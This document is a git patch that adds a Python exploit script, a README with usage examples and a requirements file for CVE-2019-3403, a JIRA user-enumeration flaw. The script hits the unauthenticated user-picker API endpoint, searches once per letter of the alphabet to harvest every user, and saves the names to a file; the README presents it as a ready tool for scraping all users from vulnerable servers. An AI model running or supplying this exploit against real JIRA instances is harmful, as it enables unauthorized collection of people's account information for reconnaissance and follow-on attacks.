From 095c1ab1d543ef4e7eb60b25e8d47b19b8922fe2 Mon Sep 17 00:00:00 2001
From: David McKennirey <david.mckennirey@gmail.com>
Date: Thu, 18 Mar 2021 23:06:19 -0400
Subject: [PATCH] add exploit code

---
 CVE-2019-3403.py | 73 ++++++++++++++++++++++++++++++++++++++++++++++++
 README.md        | 29 ++++++++++++++++++-
 requirements.txt |  7 +++++
 3 files changed, 108 insertions(+), 1 deletion(-)
 create mode 100644 CVE-2019-3403.py
 create mode 100644 requirements.txt

diff --git a/CVE-2019-3403.py b/CVE-2019-3403.py
new file mode 100644
index 0000000..7718068
--- /dev/null
+++ b/CVE-2019-3403.py
@@ -0,0 +1,73 @@
+import requests
+from bs4 import BeautifulSoup
+import json
+import argparse
+from functools import reduce
+
+def scrape_jira(target, query, verbose):
+    cleaned_info = []
+    r = requests.get(target, query)
+    users = r.json().get('users')
+    for user in users:
+        soup = BeautifulSoup(user.get('html'), 'html.parser')
+        cleaned_info.append(soup.get_text())
+    if verbose:
+        print(f'[*] Retrieved {len(users)} users for query: {query}')
+    return cleaned_info
+
+def unique(input_list):
+    unique_list = []    
+    for x in input_list:
+        if x not in unique_list:
+            unique_list.append(x)
+    return unique_list
+
+parser = argparse.ArgumentParser(description='Scrape User Information from Vulnerable JIRA Instances [CVE-2019-3403]')
+parser.add_argument('-d', '--domain', help='The domain of the target', required=True, type=str)
+parser.add_argument('-q', '--query', help='Specific query to run against the API', default='', type=str)
+parser.add_argument('-o', '--out', help='Output to a file', default='', type=str)
+parser.add_argument('-v', '--verbose', help='Verbose output', action="store_true")
+args = parser.parse_args()
+
+target = f'https://{args.domain}/rest/api/2/user/picker'
+query = {'query': args.query, 'maxResults': 1000}
+
+# Test to see if the target is vulnerable
+print(f'[*] Testing if {args.domain} is vulnerable')
+resp = requests.get(target, params=query)
+if resp.status_code != 200:
+    print(f'[-] {args.domain} is not vulnerable.')
+    exit(0)
+else:
+    print(f'[+] {args.domain} is vulnerable!')
+
+# If there is a user defined query
+if args.query != '':
+    print(f'[*] Requesting user-supplied query: {args.query}')
+    cleaned = scrape_jira(target, query, args.verbose)
+
+# Otherwise scrape everything
+else:
+    print(f'[*] No user-supplied query... scraping everything')
+
+    # This scraping method is really stupid and I hate it...
+    # but it works. You just search once for each letter of the alphabet
+    scrape_set = [chr(i) for i in range(65,91)]
+    cleaned = []
+    for search in scrape_set:
+        query = {'query': search, 'maxResults': 1000}
+        cleaned.append(scrape_jira(target, query, args.verbose))
+
+    # We have a list of lists, so lets compress that
+    cleaned = reduce(list.__add__, cleaned)
+
+final = unique(cleaned)
+print(f'[*] Scraped {len(final)} users from JIRA.')
+
+# Output
+if args.out != '':
+    with open(args.out, 'w') as f:
+        for user in final:
+            f.write(f'{user}\n')
+for user in final:
+    print(f'[+] User: {user}')
\ No newline at end of file
diff --git a/README.md b/README.md
index 605d103..ed542d6 100644
--- a/README.md
+++ b/README.md
@@ -1,2 +1,29 @@
 # CVE-2019-3403
-A simple python3 exploit for CVE-2019-3403
+I wanted to easily be able to exploit CVE-2019-3403 to scrape all the users from a JIRA application, so I threw this script together. It isn't the cleanest code ever, and it doesn't handle requests that return over 1000 users (it will just truncate them to the first 1000) - but it can quickly scrape all of the users from a vulnerable JIRA server.
+
+## Usage
+```
+usage: scrape_jira.py [-h] -d DOMAIN [-q QUERY] [-o OUT] [-v]
+
+Scrape User Information from Vulnerable JIRA Instances [CVE-2019-3403]
+
+optional arguments:
+  -h, --help            show this help message and exit
+  -d DOMAIN, --domain DOMAIN
+                        The domain of the target
+  -q QUERY, --query QUERY
+                        Specific query to run against the API
+  -o OUT, --out OUT     Output to a file
+  -v, --verbose         Verbose output
+```
+
+### Examples
+Scrape everything and save output to a file:
+```
+python3 CVE-2019-3403.py -d jira.example.com -o out.txt -v
+```
+
+Just look for a specific user:
+```
+python3 CVE-2019-3403.py -d jira.example.com -q admin
+```
\ No newline at end of file
diff --git a/requirements.txt b/requirements.txt
new file mode 100644
index 0000000..aeae463
--- /dev/null
+++ b/requirements.txt
@@ -0,0 +1,7 @@
+beautifulsoup4==4.9.3
+certifi==2020.12.5
+chardet==4.0.0
+idna==2.10
+requests==2.25.1
+soupsieve==2.2
+urllib3==1.26.4